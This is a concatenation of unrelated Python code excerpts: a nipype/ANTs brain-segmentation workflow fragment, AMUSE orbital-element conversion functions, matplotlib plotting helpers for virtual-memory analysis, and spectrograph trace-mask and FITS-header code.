# MultiplyImages ${DIMENSION} ${EXTRACTION_WM} ${ATROPOS_WM_CLASS_LABEL} ${EXTRACTION_WM}
# ImageMath ${DIMENSION} ${EXTRACTION_TMP} ME ${EXTRACTION_CSF} 10
relabel_wm = pe.Node(
MultiplyImages(
dimension=3,
second_input=in_segmentation_model[-1],
output_product_image="09_relabel_wm.nii.gz",
),
name="09_relabel_wm",
)
me_csf = pe.Node(ImageMath(operation="ME", op2="10"), name="10_me_csf")
# ImageMath ${DIMENSION} ${EXTRACTION_GM} addtozero ${EXTRACTION_GM} ${EXTRACTION_TMP}
# MultiplyImages ${DIMENSION} ${EXTRACTION_GM} ${ATROPOS_GM_CLASS_LABEL} ${EXTRACTION_GM}
# ImageMath ${DIMENSION} ${EXTRACTION_SEGMENTATION} addtozero ${EXTRACTION_WM} ${EXTRACTION_GM}
add_gm = pe.Node(ImageMath(operation="addtozero"), name="11_add_gm")
relabel_gm = pe.Node(
MultiplyImages(
dimension=3,
second_input=in_segmentation_model[-2],
output_product_image="12_relabel_gm.nii.gz",
),
name="12_relabel_gm",
)
add_gm_wm = pe.Node(ImageMath(operation="addtozero"), name="13_add_gm_wm")
# Superstep 7
# Split segmentation in binary masks
sel_labels2 = pe.Node(
niu.Function(function=_select_labels, output_names=["out_gm", "out_wm"]),
name="14_sel_labels2",
)
sel_labels2.inputs.labels = in_segmentation_model[2:]
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} addtozero ${EXTRACTION_MASK} ${EXTRACTION_TMP}
add_7 = pe.Node(ImageMath(operation="addtozero"), name="15_add_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} ME ${EXTRACTION_MASK} 2
me_7 = pe.Node(ImageMath(operation="ME", op2="2"), name="16_me_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} GetLargestComponent ${EXTRACTION_MASK}
comp_7 = pe.Node(ImageMath(operation="GetLargestComponent"), name="17_comp_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} MD ${EXTRACTION_MASK} 4
md_7 = pe.Node(ImageMath(operation="MD", op2="4"), name="18_md_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} FillHoles ${EXTRACTION_MASK} 2
fill_7 = pe.Node(ImageMath(operation="FillHoles", op2="2"), name="19_fill_7")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} addtozero ${EXTRACTION_MASK} \
# ${EXTRACTION_MASK_PRIOR_WARPED}
add_7_2 = pe.Node(ImageMath(operation="addtozero"), name="20_add_7_2")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} MD ${EXTRACTION_MASK} 5
md_7_2 = pe.Node(ImageMath(operation="MD", op2="5"), name="21_md_7_2")
# ImageMath ${DIMENSION} ${EXTRACTION_MASK} ME ${EXTRACTION_MASK} 5
me_7_2 = pe.Node(ImageMath(operation="ME", op2="5"), name="22_me_7_2")
# De-pad
depad_mask = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="23_depad_mask"
)
depad_segm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="24_depad_segm"
)
depad_gm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="25_depad_gm"
)
depad_wm = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="26_depad_wm"
)
depad_csf = pe.Node(
ImageMath(operation="PadImage", op2="-%d" % padding), name="27_depad_csf"
)
msk_conform = pe.Node(niu.Function(function=_conform_mask), name="msk_conform")
merge_tpms = pe.Node(niu.Merge(in_segmentation_model[0]), name="merge_tpms")
sel_wm = pe.Node(niu.Select(), name="sel_wm", run_without_submitting=True)
if not wm_prior:
sel_wm.inputs.index = in_segmentation_model[-1] - 1
copy_xform_wm = pe.Node(
CopyXForm(fields=["wm_map"]), name="copy_xform_wm", run_without_submitting=True
)
# Refine INU correction
inu_n4_final = pe.MapNode(
N4BiasFieldCorrection(
dimension=3,
save_bias=True,
copy_header=True,
n_iterations=[50] * 5,
convergence_threshold=1e-7,
shrink_factor=4,
bspline_fitting_distance=bspline_fitting_distance,
),
n_procs=omp_nthreads,
name="inu_n4_final",
iterfield=["input_image"],
)
try:
inu_n4_final.inputs.rescale_intensities = True
except ValueError:
warn(
"N4BiasFieldCorrection's --rescale-intensities option was added in ANTS 2.1.0 "
f"({inu_n4_final.interface.version} found.) Please consider upgrading.",
UserWarning,
)
# Apply mask
apply_mask = pe.MapNode(ApplyMask(), iterfield=["in_file"], name="apply_mask")
# fmt: off
wf.connect([
(inputnode, dil_brainmask, [("in_mask", "op1")]),
(inputnode, copy_xform, [(("in_files", _pop), "hdr_file")]),
(inputnode, copy_xform_wm, [(("in_files", _pop), "hdr_file")]),
(inputnode, pad_mask, [("in_mask", "op1")]),
(inputnode, atropos, [("in_corrected", "intensity_images")]),
(inputnode, inu_n4_final, [("in_files", "input_image")]),
(inputnode, msk_conform, [(("in_files", _pop), "in_reference")]),
(dil_brainmask, get_brainmask, [("output_image", "op1")]),
(get_brainmask, atropos, [("output_image", "mask_image")]),
(atropos, pad_segm, [("classified_image", "op1")]),
(pad_segm, sel_labels, [("output_image", "in_segm")]),
(sel_labels, get_wm, [("out_wm", "op1")]),
(sel_labels, get_gm, [("out_gm", "op1")]),
(get_gm, fill_gm, [("output_image", "op1")]),
(get_gm, mult_gm, [("output_image", "first_input")]),
(fill_gm, mult_gm, [("output_image", "second_input")]),
(get_wm, relabel_wm, [("output_image", "first_input")]),
(sel_labels, me_csf, [("out_csf", "op1")]),
(mult_gm, add_gm, [("output_product_image", "op1")]),
(me_csf, add_gm, [("output_image", "op2")]),
(add_gm, relabel_gm, [("output_image", "first_input")]),
(relabel_wm, add_gm_wm, [("output_product_image", "op1")]),
(relabel_gm, add_gm_wm, [("output_product_image", "op2")]),
(add_gm_wm, sel_labels2, [("output_image", "in_segm")]),
(sel_labels2, add_7, [("out_wm", "op1"), ("out_gm", "op2")]),
(add_7, me_7, [("output_image", "op1")]),
(me_7, comp_7, [("output_image", "op1")]),
(comp_7, md_7, [("output_image", "op1")]),
(md_7, fill_7, [("output_image", "op1")]),
(fill_7, add_7_2, [("output_image", "op1")]),
(pad_mask, add_7_2, [("output_image", "op2")]),
(add_7_2, md_7_2, [("output_image", "op1")]),
(md_7_2, me_7_2, [("output_image", "op1")]),
(me_7_2, depad_mask, [("output_image", "op1")]),
(add_gm_wm, depad_segm, [("output_image", "op1")]),
(relabel_wm, depad_wm, [("output_product_image", "op1")]),
(relabel_gm, depad_gm, [("output_product_image", "op1")]),
(sel_labels, depad_csf, [("out_csf", "op1")]),
(depad_csf, merge_tpms, [("output_image", "in1")]),
(depad_gm, merge_tpms, [("output_image", "in2")]),
(depad_wm, merge_tpms, [("output_image", "in3")]),
(depad_mask, msk_conform, [("output_image", "in_mask")]),
(msk_conform, copy_xform, [("out", "out_mask")]),
(depad_segm, copy_xform, [("output_image", "out_segm")]),
(merge_tpms, copy_xform, [("out", "out_tpms")]),
(atropos, sel_wm, [("posteriors", "inlist")]),
(sel_wm, copy_xform_wm, [("out", "wm_map")]),
(copy_xform_wm, inu_n4_final, [("wm_map", "weight_image")]),
(inu_n4_final, copy_xform, [("output_image", "bias_corrected"),
("bias_image", "bias_image")]),
(copy_xform, apply_mask, [("bias_corrected", "in_file"),
("out_mask", "in_mask")]),
(apply_mask, outputnode, [("out_file", "out_file")]),
(copy_xform, outputnode, [
("bias_corrected", "bias_corrected"),
("bias_image", "bias_image"),
("out_mask", "out_mask"),
| |
<filename>src/amuse/ext/orbital_elements.py<gh_stars>100-1000
"""
orbital element conversion and utility functions
this module provides:
generate_binaries
orbital_elements
get_orbital_elements_from_binary
get_orbital_elements_from_binaries
get_orbital_elements_from_arrays
and the following deprecated functions (assume input
or output angle floats to be degrees):
new_binary_from_orbital_elements
orbital_elements_from_binary
orbital_elements_for_rel_posvel_arrays
"""
import numpy
import warnings
from amuse.units import units, constants, nbody_system
from amuse.units.trigo import cos, sin, arccos, arctan2
from amuse.datamodel import Particles, Particle
from amuse.units.quantities import to_quantity, VectorQuantity
def derive_G(unit_or_quantity):
unit=unit_or_quantity.unit
if(unit.base_system==constants.G.unit.base_system):
G=constants.G
elif(unit.base_system==nbody_system.G.unit.base_system):
G=nbody_system.G
else:
raise Exception("units not known, provide a G constant")
return G
def newton(f, x0, fprime=None, args=(), tol=1.48e-8, maxiter=50):
if fprime is None:
warnings.warn("provide fprime")
return x0
i = 0
x = x0
while (i < maxiter):
fv = f(x, *args)
dfv = fprime(x, *args)
if(dfv == 0):
return x0, -2
delta = -fv/dfv
if(abs(delta) < tol):
return x+delta, 0
x = x+delta
i = i+1
return x, -1
def true_anomaly_from_eccentric_anomaly(E, e):
return 2*arctan2((1+e)**0.5*sin(E/2), (1-e)**0.5*cos(E/2))
def equal_length_array_or_scalar(
array, length=1, mode="continue"
):
"""
Returns 'array' if its length is equal to 'length'. If this is not the
case, returns an array of length 'length' with values equal to the first
value of the array (or if 'array' is a scalar, that value. If mode is
"warn", issues a warning if this happens; if mode is "exception" raises an
exception in this case.
"""
try:
array_length = len(array)
if array_length == length:
return array
else:
if mode == "warn":
warnings.warn("Length of array is not equal to %i. Using only\
the first value." % length)
try:
unit = array.unit
value = array[0].value_in(unit)
except:
unit = units.none
value = array[0]
array = VectorQuantity(
array=numpy.ones(length) * value,
unit=unit,
)
return array
elif mode == "exception":
raise Exception("Length of array is not equal to %i. This is\
not supported." % length)
except:
try:
unit = array.unit
value = array.value_in(unit)
except:
unit = units.none
value = array
array = VectorQuantity(
array=numpy.ones(length) * value,
unit=unit,
)
if mode == "warn":
warnings.warn("Using single value for all cases.")
return array
def center_of_mass_array(
vectors,
primary_mass,
secondary_mass,
):
"""
Returns array of center_of_mass vectors, where primaries are considered to
be at (0,0,0) and secondaries at 'vectors'.
"""
total_mass = (primary_mass + secondary_mass).reshape(
(len(primary_mass), 1)
)
center_of_mass_array = (
(
vectors
* secondary_mass.reshape(
(len(secondary_mass), 1)
)
)
/ total_mass
)
return center_of_mass_array
def orbital_period_to_semimajor_axis( T, M1, M2=None, G=None ):
if G is None:
G=derive_G(M1)
if M2 is None:
M2=0.*M1
mu = G * (M1 + M2)
semi_major_axis = ((T / (2*numpy.pi))**2 * mu)**(1./3.)
return semi_major_axis
def semimajor_axis_to_orbital_period( a, M1, M2=None, G=None ):
if G is None:
G=derive_G(M1)
if M2 is None:
M2=0.*M1
mu = G * (M1 + M2)
orbital_period = 2*numpy.pi*(a**3/mu)**0.5
return orbital_period
def rel_posvel_arrays_from_orbital_elements(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=0 | units.rad,
true_anomaly=0 | units.rad,
inclination=0 | units.rad,
longitude_of_the_ascending_node=0 | units.rad,
argument_of_periapsis=0 | units.rad,
G=None
):
"""
Returns relative positions/velocities for secondaries orbiting primaries.
If primary_mass is a scalar, assumes the same primary for all secondaries.
"""
if G is None:
G=derive_G(primary_mass)
try:
number_of_secondaries = len(secondary_mass)
except:
number_of_secondaries = 1
# arrays need to be equal to number of secondaries, or have just one value
primary_mass = equal_length_array_or_scalar(
primary_mass, length=number_of_secondaries)
semi_major_axis = equal_length_array_or_scalar(
semi_major_axis, length=number_of_secondaries)
eccentricity = equal_length_array_or_scalar(
eccentricity, length=number_of_secondaries)
true_anomaly = equal_length_array_or_scalar(
true_anomaly, length=number_of_secondaries)
inclination = equal_length_array_or_scalar(
inclination, length=number_of_secondaries)
longitude_of_the_ascending_node = equal_length_array_or_scalar(
longitude_of_the_ascending_node, length=number_of_secondaries)
argument_of_periapsis = equal_length_array_or_scalar(
argument_of_periapsis, length=number_of_secondaries)
cos_true_anomaly = cos(true_anomaly)
sin_true_anomaly = sin(true_anomaly)
cos_inclination = cos(inclination)
sin_inclination = sin(inclination)
cos_arg_per = cos(argument_of_periapsis)
sin_arg_per = sin(argument_of_periapsis)
cos_long_asc_nodes = cos(longitude_of_the_ascending_node)
sin_long_asc_nodes = sin(longitude_of_the_ascending_node)
# alpha is a unit vector directed along the line of node
alphax = (
cos_long_asc_nodes*cos_arg_per
- sin_long_asc_nodes*sin_arg_per*cos_inclination
)
alphay = (
sin_long_asc_nodes*cos_arg_per
+ cos_long_asc_nodes*sin_arg_per*cos_inclination
)
alphaz = sin_arg_per*sin_inclination
alpha = numpy.array([alphax, alphay, alphaz])
# beta is a unit vector perpendicular to alpha and the orbital angular
# momentum vector
betax = (
- cos_long_asc_nodes*sin_arg_per
- sin_long_asc_nodes*cos_arg_per*cos_inclination
)
betay = (
- sin_long_asc_nodes*sin_arg_per
+ cos_long_asc_nodes*cos_arg_per*cos_inclination
)
betaz = cos_arg_per*sin_inclination
beta = numpy.array([betax, betay, betaz])
# Relative position and velocity
separation = ( # Compute the relative separation
semi_major_axis*(1.0 - eccentricity**2)
/ (1.0 + eccentricity*cos_true_anomaly)
)
position_vector = (
separation*cos_true_anomaly*alpha
+ separation*sin_true_anomaly*beta
).T
velocity_tilde = (
(
G*(primary_mass + secondary_mass)
/ (semi_major_axis*(1.0 - eccentricity**2))
)**0.5
) # Common factor
velocity_vector = (
-1.0 * velocity_tilde * sin_true_anomaly * alpha
+ velocity_tilde*(eccentricity + cos_true_anomaly)*beta
).T
return position_vector, velocity_vector
def generate_binaries(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=0 | units.rad,
true_anomaly=0 | units.rad,
inclination=0 | units.rad,
longitude_of_the_ascending_node=0 | units.rad,
argument_of_periapsis=0 | units.rad,
G=None
):
"""
returns two particlesets, which contain the primaries and the secondaries
in binary pairs.
"""
if G is None:
G=derive_G(primary_mass)
mass_unit = primary_mass.unit
try:
number_of_primaries = len(primary_mass)
except:
number_of_primaries = 1
primary_mass = numpy.array(
[primary_mass.value_in(mass_unit)]
) | mass_unit
try:
number_of_secondaries = len(secondary_mass)
except:
number_of_secondaries = 1
secondary_mass = numpy.array(
[secondary_mass.value_in(mass_unit)]
) | mass_unit
if number_of_primaries==1 and number_of_secondaries:
number_of_primaries = number_of_secondaries
primary_mass = primary_mass[0] * numpy.ones(number_of_secondaries)
# mass arrays need to be the same length
if number_of_secondaries != number_of_primaries:
raise Exception("The number of primaries is not the same as the number\
of secondaries, this is not supported.")
position_vector, velocity_vector = rel_posvel_arrays_from_orbital_elements(
primary_mass,
secondary_mass,
semi_major_axis,
eccentricity=eccentricity,
true_anomaly=true_anomaly,
inclination=inclination,
longitude_of_the_ascending_node=longitude_of_the_ascending_node,
argument_of_periapsis=argument_of_periapsis,
G=G
)
number_of_primaries
primaries = Particles(number_of_primaries)
secondaries = Particles(number_of_secondaries)
primaries.mass = primary_mass
secondaries.mass = secondary_mass
centers_of_mass = center_of_mass_array(
position_vector, primary_mass, secondary_mass)
centers_of_mass_velocity = center_of_mass_array(
velocity_vector, primary_mass, secondary_mass)
primaries.position = - centers_of_mass
secondaries.position = position_vector - centers_of_mass
primaries.velocity = - centers_of_mass_velocity
secondaries.velocity = velocity_vector - centers_of_mass_velocity
return primaries, secondaries
def new_binary_from_orbital_elements(
mass1,
mass2,
semimajor_axis,
eccentricity=0,
true_anomaly=0 | units.deg,
inclination=0 | units.deg,
longitude_of_the_ascending_node=0 | units.deg,
argument_of_periapsis=0 | units.deg,
G=None
):
"""
returns a two-particle Particle set, with the second particle's position
and velocities computed from the input orbital elements.
inclination is given between 0 and 180 deg.
angles are assumed to be in deg if no unit is given.
"""
def angle_with_unit(angle, default_unit=units.deg):
try:
default_unit = angle.unit
except:
angle = angle | default_unit
return angle
# If no unit is given for angles, assume they are in degrees
true_anomaly = angle_with_unit(true_anomaly, default_unit=units.deg)
inclination = angle_with_unit(inclination, default_unit=units.deg)
argument_of_periapsis = angle_with_unit(
argument_of_periapsis,
default_unit=units.deg
)
longitude_of_the_ascending_node = angle_with_unit(
longitude_of_the_ascending_node,
default_unit=units.deg
)
primary, secondary = generate_binaries(
mass1, mass2, semimajor_axis,
eccentricity=eccentricity,
true_anomaly=true_anomaly,
inclination=inclination,
longitude_of_the_ascending_node=longitude_of_the_ascending_node,
argument_of_periapsis=argument_of_periapsis,
G=G
)
result = Particles()
result.add_particle(primary[0])
result.add_particle(secondary[0])
return result
def get_orbital_elements_from_binary(binary, G=None):
"""
Function that computes orbital elements from given two-particle set.
Elements are computed for the second particle in this set and the
return values are: mass1, mass2, semimajor axis, eccentricity,
cosine of true anomaly, cosine of inclination, cosine of the
longitude of the ascending node and the cosine of the argument of
pericenter. In case of a perfectly circular orbit the true anomaly
and argument of pericenter cannot be determined; in this case the
return values are 1.0 for both cosines.
"""
primaries = Particles()
secondaries = Particles()
if len(binary) > 2:
raise Exception("expects binary or single part")
elif len(binary) == 2:
primaries.add_particle(binary[0])
secondaries.add_particle(binary[1])
else:
# FIXME: in case of one particle, what do we calculate the orbit of?
# The method below is what was default before.
primaries.add_particle(binary[0])
primaries[0].position *= 0
primaries[0].velocity *= 0
secondaries.add_particle(Particle())
secondaries[0].mass = 0 * primaries[0].mass
secondaries[0].position = binary.position
secondaries[0].velocity = binary.velocity
(
mass1, mass2, semimajor_axis, eccentricity, true_anomaly,
inclination, long_asc_node, arg_per
) = get_orbital_elements_from_binaries(primaries, secondaries, G=G)
return (
mass1[0], mass2[0], semimajor_axis[0], eccentricity[0],
true_anomaly[0], inclination[0], long_asc_node[0], arg_per[0])
def orbital_elements_from_binary(binary, G=None):
(
mass1, mass2, semimajor_axis, eccentricity, true_anomaly,
inclination, long_asc_node, arg_per
) = get_orbital_elements_from_binary(binary, G=G)
return (
mass1, mass2, semimajor_axis, eccentricity,
true_anomaly.value_in(units.deg),
inclination.value_in(units.deg),
long_asc_node.value_in(units.deg),
arg_per.value_in(units.deg))
def get_orbital_elements_from_binaries(
primaries, secondaries, G=None):
"""
Function that computes orbital elements from given primaries and
secondaries.
Elements are computed for the second particle in this set and the
return values are: mass1, mass2, semimajor axis, eccentricity,
cosine of true anomaly, cosine of inclination, cosine of the
longitude of the ascending node and the cosine of the argument of
pericenter. In case of a perfectly circular orbit the true anomaly
and argument of pericenter cannot be determined; in this case the
return values are 1.0 for both cosines.
"""
position = secondaries.position - primaries.position
velocity = secondaries.velocity - primaries.velocity
mass1 = primaries.mass
mass2 = secondaries.mass
total_mass = mass1 + mass2
semimajor_axis, eccentricity, | |
<gh_stars>1-10
# Virtual memory analysis scripts.
# Developed 2012-2014 by <NAME>, <EMAIL>
# Copyright (c) 2012-2014 <NAME> and University of Washington
from util.pjh_utils import *
from plotting.PlotEvent import PlotEvent
import brewer2mpl
import copy
import itertools
import numpy as np
import plotting.plots_style as style
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.ticker import FuncFormatter
CP_SERIESNAME = 'checkpoints'
# special name to be used for series that contain datapoints for
# CheckpointEvents.
TOTALKEY = '_ToTaL_' # key that caller is unlikely to use...
PERMS_KEY_COLOR = {
'r-xsa' : style.brewer_red,
'r-xsf' : style.brewer_red,
'r-xpa' : style.brewer_red,
'r-xpf' : style.brewer_red,
'rwxsa' : style.brewer_purple,
'rwxsf' : style.brewer_purple,
'rwxpa' : style.brewer_purple,
'rwxpf' : style.brewer_purple,
'rw-sa' : style.brewer_green,
'rw-sf' : style.brewer_green,
'rw-pa' : style.brewer_green,
'rw-pf' : style.brewer_green,
'r--sa' : style.brewer_orange,
'r--sf' : style.brewer_orange,
'r--pa' : style.brewer_orange,
'r--pf' : style.brewer_orange,
'---pa' : style.brewer_blue,
'---pf' : style.brewer_blue,
}
#######################################################################
'''
Class for a generic plot datapoint; series used by a multiapp_plot may
use this class for their datapoints, or they can use their own opaque
items. Neither multiapp_plot nor series depends on this class.
This class is effectively a "struct".
'''
class datapoint:
tag = 'datapoint'
# Generic fields - no plot will use all of them, so there is some
# wasted memory space, but still seems like a good idea to have
# this generic class that can be used in particular ways by each
# plot.
# Maybe a better idea: have a generic datapoint interface that
# each particular plot must implement / subclass?
xval = None
yval = None
timestamp = None
count = None
appname = None
cp_name = None
component = None
def __init__(self):
return
# Use this for plot_lineplot().
class SmallDatapoint:
count = None
def __init__(self, count=None):
self.count = count
return
# Returns a plot datapoint when given a PlotEvent for a cp_event. Later
# on, other functions can distinguish checkpoint datapoints from other
# datapoints by checking if point.cp_name is non-None.
def new_cp_datapoint(plot_event):
tag = 'new_cp_datapoint'
if not plot_event.cp_event:
print_error(tag, ("plot_event's cp_event is None; will return "
"None").format())
return None
# Note: for timeseries data, use timestamp, not xval! timestamp
# is what's used for "normal" (non-checkpoint) datapoints.
point = datapoint()
point.timestamp = plot_event.cp_event.timestamp
if plot_event.cp_event.cp_name:
point.cp_name = plot_event.cp_event.cp_name
else:
point.cp_name = 'some-checkpoint'
return point
##############################################################################
# Creates a new figure and sets some common parameters:
# .pdf / .png size
# Title
# The figure contains a single Subplot / Axes; the caller can get a
# reference to it with "plt.axes()". If the caller wishes to add
# multiple subplots, it can call .add_subplot() on the figure that
# is returned. (The caller probably should also delete the first
# axes that is present in the returned figure - see plot_time_series().
# Note that when the first axes is deleted, the title will be removed
# also).
#
# Returns: a reference to the current figure. The figure number can be
# obtained with fig.number, then if other operations create other
# figures and make them current, the number can be used to get the
# desired one.
def plot_setup_onesubplot(title, heightfactor, widthfactor):
tag = 'plot_setup_onesubplot'
fig = plot_setup_subplots(1, 1, heightfactor, widthfactor)
ax = fig.get_axes()[0]
# Assign the title to the one and only subplot:
if title and len(title) > 1:
# This works to create a centered title, but it doesn't work with
# tight_layout() - it will get cropped, unlike a "standard" title.
# http://matplotlib.org/users/tight_layout_guide.html
#plt.text(0.5, 1.03, title, horizontalalignment='center',
# transform = ax.transAxes,
# **style.title_kwargs)
# This works pretty much the same as adding a new plt.text() as above,
# but the title ends up a little closer to the top of the plot -
# basically touching it. If this is a big problem, maybe the Text
# reference that's returned from ax.set_title() can be moved up
# directly? Or, it looks like the tight_layout() command takes a
# rect argument whose top could be increased manually...
ax.set_title(title, **style.title_kwargs)
return fig
# Does NOT set the title - with multiple subplots, not sure what subplot
# axes (if any...) the title should belong to.
# Returns: the matplotlib.figure.Figure instance. The caller can get the
# list of subplot axes by calling fig.get_axes() (which always returns
# a 1d list, I think/hope), or can get a specific subplot axes by calling
# fig.add_subplot(subplotrows, subplotcols, desiredsubplotnumber) again.
# Note that this call must be made without a **kwargs argument! (see
# the add_subplot() description: http://matplotlib.org/api/figure_api.
# html#matplotlib.figure.Figure.add_subplot).
def plot_setup_subplots(subplotrows, subplotcols, heightfactor, widthfactor):
tag = 'plot_setup_subplots'
# fig is a matplotlib.figure.Figure instance. Every
# matplotlib figure has a number; the doc for plt.figure() says
# that "The figure objects holds this number in a number attribute."
# http://matplotlib.org/api/figure_api.html?highlight=figure#modu
# le-matplotlib.figure
# The caller may wish to perform the following steps on the
# returned figure:
# num = fig.number # save for later...
# ...
# currentfig = plt.figure(num) # get reference to figure!
# plt.savefig(plot_fname)
# plt.close(currentfig)
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.close
# Note: plt.subplots() would seem to be an easier way to setup
# a figure with a specified number of subplot rows + cols, but it
# doesn't take a figsize - ugh.
# Also note: changing the scale factor to 1.0 at this point causes
# the images (both png and pdf) to come out terrible - the "canvas"
# shrinks and everything squishes together, and I have no idea why.
scale_factor = 2.0
figsize = (8*scale_factor*widthfactor, 6*scale_factor*heightfactor)
# Default figsize is (8,6): leads to an 800x600 .png image.
fig = plt.figure(num=None, figsize=figsize, dpi=style.RASTER_DPI)
# num is the figure number, not the number of subplots.
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.figure
for i in range(1, subplotrows*subplotcols + 1):
fig.add_subplot(subplotrows, subplotcols, i)
# http://matplotlib.org/api/figure_api.html#matplotlib.
# figure.Figure.add_subplot
'''
(fig, ax_array) = plt.subplots(subplotrows, subplotcols)
# http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.subplots
# Note that format of ax_array differs depending on rows and cols...
'''
print_debug(tag, ("type(fig.get_axes()) is {}").format(
type(fig.get_axes())))
return fig
# Normalizes all of the series in the serieslist to each other. The
# total "width" of the horizontal / time / x-axis data is calculated
# across all of the series in the list, and then the datapoints for
# each series normalized in-place, resulting in x-coordinates that
# are all within the range [0..1]. Also, if alignright is True, then
# a final datapoint will be added all the way to the right of the
# time axis in every series.
def normalize_appserieslist(serieslist, alignright):
tag = 'normalize_appserieslist'
xmin = None
xmax = None
for S in serieslist:
appmin = S.data[0].timestamp
appmax = S.data[-1].timestamp
if not xmin or appmin < xmin:
xmin = appmin
if not xmax or appmax > xmax:
xmax = appmax
width = xmax - xmin
for S in serieslist:
# To normalize each series, first subtract the minimum xval from
# every point so that they all start at time 0, then divide the
# point by the "width" of the execution time to get the "percent"
# time, as a normalized value between 0 and 1.
for i in range(len(S.data)):
point = S.data[i]
if width != 0:
normalized = (point.timestamp - xmin) / width
else:
# If we have just one datapoint, put it in the middle
# of the range...
normalized = 0.5
point.timestamp = normalized
if alignright:
if S.data[-1].timestamp < 1.0:
lastpoint = copy.deepcopy(S.data[-1])
lastpoint.timestamp = 1.0
S.data.append(lastpoint)
return
def percent0_formatter_func(n, pos=0):
# This works to still use an integer percent label when log-scale is
# enabled.
return "{}%".format(int(round(n*100)))
#return ("{0:.0f}%".format(n*100))
def percent1_formatter_func(n, pos=0):
# Percentages: multiply by 100, *then* round to 1 decimal.
return ("{:.1f}%".format(n*100))
def percent2_formatter_func(n, pos=0):
# Percentages: multiply by 100, *then* round to 2 decimals.
return ("{:.2f}%".format(n*100))
def log_to_standard_formatter_func(n, pos=0):
# Show scale as 10, 100, 1000, etc., rather than 10^1, 10^2, etc.
return "{}".format(int(n))
def billions_formatter_func(n, pos=0):
divideby = 1000000000
return ("{}".format(int(n/divideby)))
# Input:
# A dict that maps series names to:
# A list of datapoint objects, whose "timestamp" and "count" fields
# are set! (the timestamp values in the list must be sorted?)
# Title / labels
# ysplits: y-axis values to split plot apart at. For example, a
# ysplits list of [100, 1000] will cause this method to split the
# series into three timeseries plots: one for series whose maximum
# value is <= 100, one for series whose maximum value is between
# 101 and 1000, and one for series whose maximum value is greater
# than 1000.
# yax_units: display y-axis values as percentages rather than decimal.
# cp_series: a series object containing datapoints for CheckpointEvents.
# Returns: a matplotlib.figure.Figure instance, or None if a figure
# could not be generated.
def plot_time_series(plotdict, title, x_axislabel, y_axislabel,
ysplits, logscale=False, yax_units=None, cp_series=None,
more_ytick_space=False):
tag = 'plot_time_series'
return plot_scatter_lineplot(plotdict, title, x_axislabel, y_axislabel,
ysplits, logscale=logscale, yax_units=yax_units,
cp_series=cp_series, is_timeseries=True, stepped=True,
more_ytick_space=more_ytick_space)
# Simple lineplot, where each series in the plotdict has exactly
# one point per xlabel. The points in the lists held in the plotdict
# values must be datapoint or SmallDatapoint objects.
# Returns: a matplotlib.figure.Figure instance, or None if a figure
# could not be generated.
def plot_lineplot(plotdict, title, x_axislabel, y_axislabel, xlabels,
ysplits, logscale=False, yax_units=None,
#show_markers=True,
hlines=None, vertical_xlabels=False):
tag = 'plot_lineplot'
if True: # I think we always expect this:
for (seriesname, pointlist) in list(plotdict.items()):
if len(pointlist) != len(xlabels):
print_unexpected(True, tag, | |
get_trace_list(self):
"""Return raw trace fit parameters."""
return self._trace_list
# Return full primary data header:
def get_metadata(self):
return self._metadata
# Return traces as pixel masks (requires appropriate metadata):
def get_trace_masks(self, vlevel=0):
"""Returns traces as pixel masks."""
if not self._imshape:
sys.stderr.write("Image dimensions not available!\n")
#return None
raise
return self._mask_from_traces(self._imshape, self._trace_list, vlevel)
# Evaluate ridge corresponding to specified trace:
def _ridge_from_trace(self, tr_model):
"""Evaluate X,Y ridge from input trace model."""
xvals = np.arange(tr_model['xmin'], tr_model['xmax']).astype('uint16')
yvals = ridge_eval(tr_model['params'], xvals)
return (xvals, yvals)
# Build pixel masks corresponding to listed traces:
def _mask_from_traces(self, imshape, trace_list, vlevel=0):
mask_image = np.zeros(imshape, dtype='bool')
trace_coords = []
n_traces = len(trace_list)
for i,trace_fit in enumerate(trace_list, 1):
if (vlevel >= 1):
sys.stderr.write("\rAdding trace %d of %d ... " % (i, n_traces))
#xlist = np.arange(trace_fit['xmin'],
# trace_fit['xmax']).astype('uint16')
#ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
xlist, ordfit_ycoord = self._ridge_from_trace(trace_fit)
ylower = np.int_(np.floor(ordfit_ycoord))
yc_list, xc_list = [], []
apron_pix = trace_fit['apron']
for offset in range(-apron_pix + 1, apron_pix + 1):
xc_list.append(xlist)
yc_list.append(ylower + offset)
pass
trace_coords.append((np.vstack(yc_list), np.vstack(xc_list)))
return trace_coords
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
## In this (initial) format, each trace will be given its own HDU. That HDU has
## a single 'params' column with the polynomial fit coefficients. Each HDU also
## has a few keywords providing useful metadata.
## Metadata keyword/comment mapping ():
_trace_hkey_spec = [
( 'xmin', 'XMIN', '[pixel] trace lower X limit (left side)'),
( 'xmax', 'XMAX', '[pixel] trace upper X limit (right side)'),
('apron', 'APRON', '[pixel] apron size used for tracing'),
( 'fnum', 'FIBERNUM', 'NRES fiber/channel number (0/1/2)'),
('impos', 'FIBIMPOS', 'NRES fiber/channel position (top/mid/bot)'),
]
_metadata_order = ['EXTRVERS', 'TR_IMAGE', 'SRC_XPIX', 'SRC_YPIX',
'TRMETHOD', 'TRB_XMID', 'TRB_HALF', 'BAFFMASK', 'YPROFILE', ]
class TraceIO(object):
def __init__(self):
self._divcmt = pf.Card("COMMENT", 65*'-')
return
def _header_from_dict(self, fit_data):
c_list = [self._divcmt]
for dkey,fkey,cmnt in _trace_hkey_spec:
if dkey in fit_data.keys():
c_list.append(pf.Card(fkey, fit_data[dkey], comment=cmnt))
